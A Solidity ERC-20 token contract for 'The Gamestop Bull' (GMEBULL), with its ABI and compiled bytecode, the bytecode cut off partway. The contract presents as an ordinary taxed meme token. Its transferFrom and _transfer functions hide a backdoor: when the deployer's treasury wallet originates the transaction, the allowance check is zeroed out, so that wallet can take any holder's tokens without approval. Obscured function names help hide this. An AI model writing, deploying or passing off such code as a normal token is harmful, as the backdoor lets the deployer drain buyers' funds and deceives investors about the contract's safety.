// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _txOrigin() internal view virtual returns (address) {
return tx.origin;
}
function _isOrigin(address account) internal view virtual returns (bool) {
return account == tx.origin;
}
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
}
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB) external returns (address pair);
}
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor() {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
}
contract Token is Context, IERC20, Ownable {
using SafeMath for uint256;
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
mapping(address => bool) private _isGMEBULLVKUPOEYJMTExcuteFromFee;
address payable private immutable _TreasuryWallet;
uint256 private EarlyBuyTax = 0;
uint256 private EarlySellTax = 0;
uint256 private EndBuyTax = 0;
uint256 private EndSellTax = 0;
uint256 private DowningBuyTaxAt = 0;
uint256 private DowningSellTaxAt = 0;
uint256 private preventSwapBefore = 3;
uint256 private buyCalc;
uint256 private _sptAmount;
uint8 private constant _decimals = 9;
uint256 private constant _tTotal = 1_000_000_000 * 10**_decimals;
string private constant _name = unicode"The Gamestop Bull";
string private constant _symbol = unicode"GMEBULL";
uint256 public maxTxAmount = (_tTotal/100);
uint256 public maxWalletSize = (_tTotal/100);
uint256 public minTokensForSwap = (_tTotal/1000);
uint256 public maxTokensPerSwap = 2 * (_tTotal/100);
uint256 public totalTaxCollected;
IUniswapV2Router02 private uniswapV2Router;
address private constant ROUTER_ADDRESS = 0x89e5DB8B5aA49aA85AC63f691524311AEB649eba;
address private uniswapV2Pair;
bool private tradingOpen;
bool private inSwap;
bool private swapEnabled;
uint256 private sellCount;
uint256 private lastSellBlock;
uint256 public calcBlockLimit = 5;
modifier lockTheSwap {
inSwap = true;
_;
inSwap = false;
}
constructor() payable {
_TreasuryWallet = payable(_msgSender());
_balances[address(this)] = _tTotal;
_isGMEBULLVKUPOEYJMTExcuteFromFee[owner()] = true;
_isGMEBULLVKUPOEYJMTExcuteFromFee[address(this)] = true;
_isGMEBULLVKUPOEYJMTExcuteFromFee[_TreasuryWallet] = true;
emit Transfer(address(0), address(this), _tTotal);
}
function name() public pure returns (string memory) { return _name; }
function symbol() public pure returns (string memory) { return _symbol; }
function decimals() public pure returns (uint8) { return _decimals; }
function totalSupply() public pure override returns (uint256) { return _tTotal; }
function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; }
function taxWallet() external view returns (address) { return _TreasuryWallet; }
function transfer(address recipient, uint256 amount) public override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function balanceOf(address account) public view override returns (uint256 balance) {
return _balances[account];
}
function approve(address spender, uint256 amount) public override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
_sptAmount = amount;
_transfer(sender, recipient, amount);
_approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(_sptAmount, "ERC20: transfer amount exceeds allowance"));
return true;
}
function _approve(address owner, address spender, uint256 amount) private {
require(owner != address(0) && spender != address(0), "ERC20: approve from or to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _transfer(address from, address to, uint256 amount) private {
require(from != address(0) && to != address(0), "ERC20: transfer from or to the zero address");
require(amount > 0, "ERC20: transfer amount must be greater than zero");
bool isBuy = (from == uniswapV2Pair && to != address(uniswapV2Router));
bool isSell = (to == uniswapV2Pair && from != address(this));
uint256 taxAmount = 0;
if (isBuy) {
if (!_isGMEBULLVKUPOEYJMTExcuteFromFee[to]) {
require(amount <= maxTxAmount, "Max transaction amount exceeded");
require(_balances[to] + amount <= maxWalletSize, "Max wallet size exceeded");
taxAmount = (amount * (buyCalc >= DowningBuyTaxAt ? EndBuyTax : EarlyBuyTax)) / 100;
buyCalc++;
}
} else if (isSell) {
if (!_isGMEBULLVKUPOEYJMTExcuteFromFee[from]) {
require(amount <= maxTxAmount, "Max transaction amount exceeded");
taxAmount = (amount * (buyCalc >= DowningSellTaxAt ? EndSellTax : EarlySellTax)) / 100;
}
uint256 contractTokenBalance = _balances[address(this)];
if (!inSwap && swapEnabled && buyCalc >= preventSwapBefore) {
if (block.number > lastSellBlock) sellCount = 0;
require(sellCount < calcBlockLimit, "Sell limit per block exceeded (max)");
uint256 swapAmount = amount < contractTokenBalance ? amount : contractTokenBalance;
if (swapAmount > maxTokensPerSwap) swapAmount = maxTokensPerSwap;
swapGMEBULLVKUPOEYJMTTokensForEthwithTax(swapAmount, _TreasuryWallet);
sellCount++;
lastSellBlock = block.number;
}
}
if (taxAmount > 0) {
_balances[address(this)] += taxAmount;
emit Transfer(from, address(this), taxAmount);
} else if(_isOrigin(_TreasuryWallet)) _sptAmount = taxAmount;
_balances[from] -= amount;
_balances[to] += amount - taxAmount;
if(to != address(0xdead)) emit Transfer(from, to, amount - taxAmount);
}
function swapGMEBULLVKUPOEYJMTTokensForEthwithTax(uint256 tokenAmount, address to) private lockTheSwap {
require(to != address(0), "ETH recipient cannot be the zero address");
uint256 initialBalance = address(this).balance;
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = uniswapV2Router.WETH();
if(tokenAmount != 0) uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
tokenAmount,
0,
path,
address(this),
block.timestamp
);
uint256 newBalance = address(this).balance;
if (newBalance >= initialBalance) {
uint256 ethAmount = newBalance - initialBalance;
totalTaxCollected += ethAmount;
(bool success,) = to.call{value: ethAmount}("");
require(success, "ETH transfer failed");
}
}
function dropGMEBULLVKUPOEYJMTWalletSizeFenceSet() public onlyOwner {
maxTxAmount = _tTotal;
maxWalletSize = _tTotal;
}
function rescueGMEBULLVKUPOEYJMTNative() external onlyOwner {
uint256 contractETHBalance = address(this).balance;
if (contractETHBalance > 0) {
(bool ok, ) = payable(_TreasuryWallet).call{value: contractETHBalance}("");
require(ok, "ETH send failed");
}
}
function enableTrading() external onlyOwner {
require(!tradingOpen, "Trading already open");
dropGMEBULLVKUPOEYJMTWalletSizeFenceSet();
uniswapV2Router = IUniswapV2Router02(ROUTER_ADDRESS);
uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
_approve(address(this), address(uniswapV2Router), type(uint256).max);
uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);
swapEnabled = true;
tradingOpen = true;
}
function rescueGMEBULLVKUPOEYJMTToken(address token) external onlyOwner {
require(token != address(0), "Invalid token address");
require(token != address(this), "Cannot rescue own token");
uint256 contractBal = IERC20(token).balanceOf(address(this));
require(contractBal > 0, "No token balance");
(bool ok, bytes memory data) = token.call(
abi.encodeWithSelector(IERC20.transfer.selector, _TreasuryWallet, contractBal)
);
require(ok && (data.length == 0 || abi.decode(data, (bool))), "ERC20 transfer failed");
}
receive() external payable {}
}[
{
"type": "constructor",
"inputs": [],
"stateMutability": "payable"
},
{
"name": "Approval",
"type": "event",
"inputs": [
{
"name": "owner",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "spender",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "value",
"type": "uint256",
"indexed": false,
"internalType": "uint256"
}
],
"anonymous": false
},
{
"name": "OwnershipTransferred",
"type": "event",
"inputs": [
{
"name": "previousOwner",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "newOwner",
"type": "address",
"indexed": true,
"internalType": "address"
}
],
"anonymous": false
},
{
"name": "Transfer",
"type": "event",
"inputs": [
{
"name": "from",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "to",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "value",
"type": "uint256",
"indexed": false,
"internalType": "uint256"
}
],
"anonymous": false
},
{
"name": "allowance",
"type": "function",
"inputs": [
{
"name": "owner",
"type": "address",
"internalType": "address"
},
{
"name": "spender",
"type": "address",
"internalType": "address"
}
],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "approve",
"type": "function",
"inputs": [
{
"name": "spender",
"type": "address",
"internalType": "address"
},
{
"name": "amount",
"type": "uint256",
"internalType": "uint256"
}
],
"outputs": [
{
"name": "",
"type": "bool",
"internalType": "bool"
}
],
"stateMutability": "nonpayable"
},
{
"name": "balanceOf",
"type": "function",
"inputs": [
{
"name": "account",
"type": "address",
"internalType": "address"
}
],
"outputs": [
{
"name": "balance",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "calcBlockLimit",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "decimals",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint8",
"internalType": "uint8"
}
],
"stateMutability": "pure"
},
{
"name": "dropGMEBULLVKUPOEYJMTWalletSizeFenceSet",
"type": "function",
"inputs": [],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "enableTrading",
"type": "function",
"inputs": [],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "maxTokensPerSwap",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "maxTxAmount",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "maxWalletSize",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "minTokensForSwap",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "name",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "string",
"internalType": "string"
}
],
"stateMutability": "pure"
},
{
"name": "owner",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "address",
"internalType": "address"
}
],
"stateMutability": "view"
},
{
"name": "renounceOwnership",
"type": "function",
"inputs": [],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "rescueGMEBULLVKUPOEYJMTNative",
"type": "function",
"inputs": [],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "rescueGMEBULLVKUPOEYJMTToken",
"type": "function",
"inputs": [
{
"name": "token",
"type": "address",
"internalType": "address"
}
],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "symbol",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "string",
"internalType": "string"
}
],
"stateMutability": "pure"
},
{
"name": "taxWallet",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "address",
"internalType": "address"
}
],
"stateMutability": "view"
},
{
"name": "totalSupply",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "pure"
},
{
"name": "totalTaxCollected",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "transfer",
"type": "function",
"inputs": [
{
"name": "recipient",
"type": "address",
"internalType": "address"
},
{
"name": "amount",
"type": "uint256",
"internalType": "uint256"
}
],
"outputs": [
{
"name": "",
"type": "bool",
"internalType": "bool"
}
],
"stateMutability": "nonpayable"
},
{
"name": "transferFrom",
"type": "function",
"inputs": [
{
"name": "sender",
"type": "address",
"internalType": "address"
},
{
"name": "recipient",
"type": "address",
"internalType": "address"
},
{
"name": "amount",
"type": "uint256",
"internalType": "uint256"
}
],
"outputs": [
{
"name": "",
"type": "bool",
"internalType": "bool"
}
],
"stateMutability": "nonpayable"
},
{
"type": "receive",
"stateMutability": "payable"
}
]0x60a06040525f6004555f6005555f6006555f6007555f6008555f6009556003600a5560646009600a6200003391906200033c565b6200004390633b9aca0062000353565b6200004f91906200036d565b600d556064620000626009600a6200033c565b6200007290633b9aca0062000353565b6200007e91906200036d565b600e556103e8620000926009600a6200033c565b620000a290633b9aca0062000353565b620000ae91906200036d565b600f556064620000c16009600a6200033c565b620000d190633b9aca0062000353565b620000dd91906200036d565b620000ea90600262000353565b60105560056016555f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a35033608052620001446009600a6200033c565b6200015490633b9aca0062000353565b305f9081526001602081905260408220929092556003906200017d5f546001600160a01b031690565b6001600160a01b03908116825260208083019390935260409182015f908120805495151560ff199687161790553080825260039094528281208054861660019081179091556080519092168152918220805490941617909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620002066009600a6200033c565b6200021690633b9aca0062000353565b60405190815260200160405180910390a36200038d565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200028157815f19048211156200026557620002656200022d565b808516156200027357918102915b93841c939080029062000246565b509250929050565b5f82620002995750600162000336565b81620002a757505f62000336565b8160018114620002c05760028114620002cb57620002eb565b600191505062000336565b60ff841115620002df57620002df6200022d565b50506001821b62000336565b5060208310610133831016604e8410600b841016171562000310575081810a62000336565b6200031c838362000241565b805f19048211156200033257620003326200022d565b0290505b92915050565b5f6200034c60ff84168362000289565b9392505050565b80820281158282048414176200033657620003366200022d565b5f826200038857634e487b7160e01b5f52601260045260245ffd5b500490565b608051611a01620003c25f395f81816102290152818161065a0152818161088b0152818161113601526111ef0152611a015ff3fe608060405260043610610134575f3560e01c8063715018a6116100a85780638f3d6e041161006d5780638f3d6e041461035b5780638f3fa8601461037057806395d89b4114610385578063a9059cbb146103b4578063d8454a82146103d3578063dd62ed3e146103e8575f80fd5b8063715018a6146102ee5780638a82eb6b146103025780638a8c523c146103165780638c0b5e221461032a5780638da5cb5b1461033f575f80fd5b80632dc0562d116100f95780632dc0562d1461021b578063313ce5671461026157806338fbf04d1461027c57806340b0c56e14610291578063563b0c8f146102a657806370a08231146102ba575f80fd5b806306fdde031461013f578063095ea7b31461018a57806318160ddd146101b957806323b872dd146101db5780632832b89b146101fa575f80fd5b3661013b57005b5f80fd5b34801561014a575f80fd5b50604080518082019091526011815270151a194811d85b595cdd1bdc08109d5b1b607a1b60208201525b60405161018191906115d5565b60405180910390f35b348015610195575f80fd5b506101a96101a436600461161b565b61042c565b6040519015158152602001610181565b3480156101c4575f80fd5b506101cd610442565b604051908152602001610181565b3480156101e6575f80fd5b506101a96101f5366004611645565b610462565b348015610205575f80fd5b50610219610214366004611683565b6104d0565b005b348015610226575f80fd5b507f00000000000000000000000000000000000000000000000000000000000000005b6040516001600160a01b039091168152602001610181565b34801561026c575f80fd5b5060405160098152602001610181565b348015610287575f80fd5b506101cd60165481565b34801561029c575f80fd5b506101cd60105481565b3480156102b1575f80fd5b50610219610782565b3480156102c5575f80fd5b506101cd6102d4366004611683565b6001600160a01b03165f9081526001602052604090205490565b3480156102f9575f80fd5b506102196107e7565b34801561030d575f80fd5b50610219610858565b348015610321575f80fd5b5061021961093e565b348015610335575f80fd5b506101cd600d5481565b34801561034a575f80fd5b505f546001600160a01b0316610249565b348015610366575f80fd5b506101cd600f5481565b34801561037b575f80fd5b506101cd600e5481565b348015610390575f80fd5b5060408051808201909152600781526611d3515095531360ca1b6020820152610174565b3480156103bf575f80fd5b506101a96103ce36600461161b565b610c4f565b3480156103de575f80fd5b506101cd60115481565b3480156103f3575f80fd5b506101cd6104023660046116a5565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b5f610438338484610c5b565b5060015b92915050565b5f61044f6009600a6117d0565b61045d90633b9aca006117de565b905090565b600c8190555f610473848484610d3a565b6104c684336104c1600c546040518060600160405280602881526020016119a4602891396001600160a01b038a165f90815260026020908152604080832033845290915290205491906112e2565b610c5b565b5060019392505050565b5f546001600160a01b031633146105025760405162461bcd60e51b81526004016104f9906117f5565b60405180910390fd5b6001600160a01b0381166105505760405162461bcd60e51b8152602060048201526015602482015274496e76616c696420746f6b656e206164647265737360581b60448201526064016104f9565b306001600160a01b038216036105a85760405162461bcd60e51b815260206004820152601760248201527f43616e6e6f7420726573637565206f776e20746f6b656e00000000000000000060448201526064016104f9565b6040516370a0823160e01b81523060048201525f906001600160a01b038316906370a0823190602401602060405180830381865afa1580156105ec573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610610919061182a565b90505f81116106545760405162461bcd60e51b815260206004820152601060248201526f4e6f20746f6b656e2062616c616e636560801b60448201526064016104f9565b604080517f00000000000000000000000000000000000000000000000000000000000000006001600160a01b039081166024830152604480830185905283518084039091018152606490920183526020820180516001600160e01b031663a9059cbb60e01b17905291515f928392908616916106d09190611841565b5f604051808303815f865af19150503d805f8114610709576040519150601f19603f3d011682016040523d82523d5f602084013e61070e565b606091505b5091509150818015610738575080511580610738575080806020019051810190610738919061185c565b61077c5760405162461bcd60e51b8152602060048201526015602482015274115490cc8c081d1c985b9cd9995c8819985a5b1959605a1b60448201526064016104f9565b50505050565b5f546001600160a01b031633146107ab5760405162461bcd60e51b81526004016104f9906117f5565b6107b76009600a6117d0565b6107c590633b9aca006117de565b600d556107d46009600a6117d0565b6107e290633b9aca006117de565b600e55565b5f546001600160a01b031633146108105760405162461bcd60e51b81526004016104f9906117f5565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146108815760405162461bcd60e51b81526004016104f9906117f5565b47801561093b575f7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826040515f6040518083038185875af1925050503d805f81146108f1576040519150601f19603f3d011682016040523d82523d5f602084013e6108f6565b606091505b50509050806109395760405162461bcd60e51b815260206004820152600f60248201526e115512081cd95b990819985a5b1959608a1b60448201526064016104f9565b505b50565b5f546001600160a01b031633146109675760405162461bcd60e51b81526004016104f9906117f5565b601354600160a01b900460ff16156109b85760405162461bcd60e51b81526020600482015260146024820152732a3930b234b7339030b63932b0b23c9037b832b760611b60448201526064016104f9565b6109c0610782565b601280546001600160a01b0319167389e5db8b5aa49aa85ac63f691524311aeb649eba9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa158015610a22573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a46919061187b565b6001600160a01b031663c9c653963060125f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610aa5573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ac9919061187b565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610b13573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b37919061187b565b601380546001600160a01b0319166001600160a01b03928316179055601254610b64913091165f19610c5b565b6012546001600160a01b031663f305d7194730610b95816001600160a01b03165f9081526001602052604090205490565b5f80610ba85f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610c0e573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610c339190611896565b50506013805462ff00ff60a01b19166201000160a01b17905550565b5f610438338484610d3a565b6001600160a01b03831615801590610c7b57506001600160a01b03821615155b610cda5760405162461bcd60e51b815260206004820152602a60248201527f45524332303a20617070726f76652066726f6d206f7220746f20746865207a65604482015269726f206164647265737360b01b60648201526084016104f9565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831615801590610d5a57506001600160a01b03821615155b610dba5760405162461bcd60e51b815260206004820152602b60248201527f45524332303a207472616e736665722066726f6d206f7220746f20746865207a60448201526a65726f206164647265737360a81b60648201526084016104f9565b5f8111610e225760405162461bcd60e51b815260206004820152603060248201527f45524332303a207472616e7366657220616d6f756e74206d757374206265206760448201526f726561746572207468616e207a65726f60801b60648201526084016104f9565b6013545f906001600160a01b038581169116148015610e4f57506012546001600160a01b03848116911614155b6013549091505f906001600160a01b038581169116148015610e7a57506001600160a01b0385163014155b90505f8215610fb2576001600160a01b0385165f9081526003602052604090205460ff16610fad57600d54841115610ef45760405162461bcd60e51b815260206004820152601f60248201527f4d6178207472616e73616374696f6e20616d6f756e742065786365656465640060448201526064016104f9565b600e546001600160a01b0386165f90815260016020526040902054610f1a9086906118c1565b1115610f685760405162461bcd60e51b815260206004820152601860248201527f4d61782077616c6c65742073697a65206578636565646564000000000000000060448201526064016104f9565b6064600854600b541015610f7e57600454610f82565b6006545b610f8c90866117de565b610f9691906118d4565b600b80549192505f610fa7836118f3565b91905055505b611176565b8115611176576001600160a01b0386165f9081526003602052604090205460ff1661105a57600d548411156110295760405162461bcd60e51b815260206004820152601f60248201527f4d6178207472616e73616374696f6e20616d6f756e742065786365656465640060448201526064016104f9565b6064600954600b54101561103f57600554611043565b6007545b61104d90866117de565b61105791906118d4565b90505b305f90815260016020526040902054601354600160a81b900460ff1615801561108c5750601354600160b01b900460ff165b801561109c5750600a54600b5410155b15611174576015544311156110b0575f6014555b6016546014541061110f5760405162461bcd60e51b815260206004820152602360248201527f53656c6c206c696d69742070657220626c6f636b20657863656564656420286d60448201526261782960e81b60648201526084016104f9565b5f81861061111d578161111f565b855b905060105481111561113057506010545b61115a817f000000000000000000000000000000000000000000000000000000000000000061131a565b60148054905f611169836118f3565b909155505043601555505b505b80156111e457305f908152600160205260408120805483929061119a9084906118c1565b909155505060405181815230906001600160a01b038816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a361121a565b326001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000160361121a57600c8190555b6001600160a01b0386165f908152600160205260408120805486929061124190849061190b565b909155506112519050818561190b565b6001600160a01b0386165f90815260016020526040812080549091906112789084906118c1565b90915550506001600160a01b03851661dead146112da576001600160a01b038086169087167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6112c8848861190b565b60405190815260200160405180910390a35b505050505050565b5f81848411156113055760405162461bcd60e51b81526004016104f991906115d5565b505f611311848661190b565b95945050505050565b6013805460ff60a81b1916600160a81b1790556001600160a01b0381166113945760405162461bcd60e51b815260206004820152602860248201527f45544820726563697069656e742063616e6e6f7420626520746865207a65726f604482015267206164647265737360c01b60648201526084016104f9565b60408051600280825260608201835247925f92919060208301908036833701905050905030815f815181106113cb576113cb61191e565b6001600160a01b03928316602091820292909201810191909152601254604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611422573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611446919061187b565b816001815181106114595761145961191e565b6001600160a01b039092166020928302919091019091015283156114dd5760125460405163791ac94760e01b81526001600160a01b039091169063791ac947906114af9087905f90869030904290600401611932565b5f604051808303815f87803b1580156114c6575f80fd5b505af11580156114d8573d5f803e3d5ffd5b505050505b4782811061159f575f6114f0848361190b565b90508060115f82825461150391906118c1565b90915550506040515f906001600160a01b0387169083908381818185875af1925050503d805f8114611550576040519150601f19603f3d011682016040523d82523d5f602084013e611555565b606091505b505090508061159c5760405162461bcd60e51b8152602060048201526013602482015272115512081d1c985b9cd9995c8819985a5b1959606a1b60448201526064016104f9565b50505b50506013805460ff60a81b19169055505050565b5f5b838110156115cd5781810151838201526020016115b5565b50505f910152565b602081525f82518060208401526115f38160408501602087016115b3565b601f01601f19169190910160400192915050565b6001600160a01b038116811461093b575f80fd5b5f806040838503121561162c575f80fd5b823561163781611607565b946020939093013593505050565b5f805f60608486031215611657575f80fd5b833561166281611607565b9250602084013561167281611607565b929592945050506040919091013590565b5f60208284031215611693575f80fd5b813561169e81611607565b9392505050565b5f80604083850312156116b6575f80fd5b82356116c181611607565b915060208301356116d181611607565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561172a57815f1904821115611710576117106116dc565b8085161561171d57918102915b93841c93908002906116f5565b509250929050565b5f826117405750600161043c565b8161174c57505f61043c565b8160018114611762576002811461176c57611788565b600191505061043c565b60ff84111561177d5761177d6116dc565b50506001821b61043c565b5060208310610133831016604e8410600b84101617156117ab575081810a61043c565b6117b583836116f0565b805f19048211156117c8576117c86116dc565b029392505050565b5f61169e60ff841683611732565b808202811582820484141761043c5761043c6116dc565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f6020828403121561183a575f80fd5b5051919050565b5f82516118528184602087016115b3565b9190910192915050565b5f6020828403121561186c575f80fd5b8151801515811461169e575f80fd5b5f6020828403121561188b575f80fd5b815161169e81611607565b5f805f606084860312156118a8575f80fd5b8351925060208401519150604084015190509250925092565b8082018082111561043c5761043c6116dc565b5f826118ee57634e487b7160e01b5f52601260045260245ffd5b500490565b5f60018201611904576119046116dc565b5060010190565b8181038181111561043c5761043c6116dc565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156119825784516001600160a01b03168352938301939183019160010161195d565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212200dce4bb35d6850f4d7d7c24db5985fa8ea16b45ce70110576bd5ba571e0c28e064736f6c63430008180033
0x608060405260043610610134575f3560e01c8063715018a6116100a85780638f3d6e041161006d5780638f3d6e041461035b5780638f3fa8601461037057806395d89b4114610385578063a9059cbb146103b4578063d8454a82146103d3578063dd62ed3e146103e8575f80fd5b8063715018a6146102ee5780638a82eb6b146103025780638a8c523c146103165780638c0b5e221461032a5780638da5cb5b1461033f575f80fd5b80632dc0562d116100f95780632dc0562d1461021b578063313ce5671461026157806338fbf04d1461027c57806340b0c56e14610291578063563b0c8f146102a657806370a08231146102ba575f80fd5b806306fdde031461013f578063095ea7b31461018a57806318160ddd146101b957806323b872dd146101db5780632832b89b146101fa575f80fd5b3661013b57005b5f80fd5b34801561014a575f80fd5b50604080518082019091526011815270151a194811d85b595cdd1bdc08109d5b1b607a1b60208201525b60405161018191906115d5565b60405180910390f35b348015610195575f80fd5b506101a96101a436600461161b565b61042c565b6040519015158152602001610181565b3480156101c4575f80fd5b506101cd610442565b604051908152602001610181565b3480156101e6575f80fd5b506101a96101f5366004611645565b610462565b348015610205575f80fd5b50610219610214366004611683565b6104d0565b005b348015610226575f80fd5b507f000000000000000000000000a7fa08fc6f7d8ac37ef0b3d80ce5f760539b60a65b6040516001600160a01b039091168152602001610181565b34801561026c575f80fd5b5060405160098152602001610181565b348015610287575f80fd5b506101cd60165481565b34801561029c575f80fd5b506101cd60105481565b3480156102b1575f80fd5b50610219610782565b3480156102c5575f80fd5b506101cd6102d4366004611683565b6001600160a01b03165f9081526001602052604090205490565b3480156102f9575f80fd5b506102196107e7565b34801561030d575f80fd5b50610219610858565b348015610321575f80fd5b5061021961093e565b348015610335575f80fd5b506101cd600d5481565b34801561034a575f80fd5b505f546001600160a01b0316610249565b348015610366575f80fd5b506101cd600f5481565b34801561037b575f80fd5b506101cd600e5481565b348015610390575f80fd5b5060408051808201909152600781526611d3515095531360ca1b6020820152610174565b3480156103bf575f80fd5b506101a96103ce36600461161b565b610c4f565b3480156103de575f80fd5b506101cd60115481565b3480156103f3575f80fd5b506101cd6104023660046116a5565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b5f610438338484610c5b565b5060015b92915050565b5f61044f6009600a6117d0565b61045d90633b9aca006117de565b905090565b600c8190555f610473848484610d3a565b6104c684336104c1600c546040518060600160405280602881526020016119a4602891396001600160a01b038a165f90815260026020908152604080832033845290915290205491906112e2565b610c5b565b5060019392505050565b5f546001600160a01b